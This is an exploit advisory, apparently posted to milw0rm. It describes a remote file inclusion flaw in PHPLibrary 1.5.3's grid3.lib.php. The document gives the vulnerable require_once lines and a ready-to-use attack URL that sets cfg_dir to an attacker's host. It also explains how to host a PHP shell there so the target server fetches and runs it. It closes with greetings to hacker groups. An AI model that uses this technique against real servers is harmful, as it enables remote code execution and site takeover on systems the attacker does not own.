################################################################################## # PHPLibrary <= 1.5.3 Remote File Inclusion # Download Source : http://download.softerra.com/files/PHPLibrary-1.5.3.zip # # Found By : k1tk4t - k1tk4t[4t]newhack.org # Location : Indonesia -- #newhack[dot]org ######################################################################## file ; grid3.lib.php ######################################################################## bugs ; require_once ($cfg_dir . "database.cfg.php"); require_once ($cfg_dir . "error.codes.php"); require_once ($lib_dir . "sqlstorage.class.php"); require_once ($lib_dir . "registry.lib.php"); ######################################################################## exmple and methode exploit ; http://localhost/PHPLibrary-1.5.3/example/lib/grid3.lib.php?cfg_dir=http://RemoteShell/ at http://RemoteShell/ make direktory 'database.cfg.php' and put phpshell in index.html inside 'database.cfg.php' direktory http://RemoteShell/database.cfg.php/index.html ######################################################################## Thanks; str0ke milw0rm google #e-c-h-o (all member echo community) #nyubi (all member solpotcrew community) person; y3dips, lirva32, the_day,(&all echo staff) evilcode,illibero,NoGe(asiahacker), nyubi,x-ace,ghoz, home_edition2001,matdhule, iFX, and for all (friend's&enemy)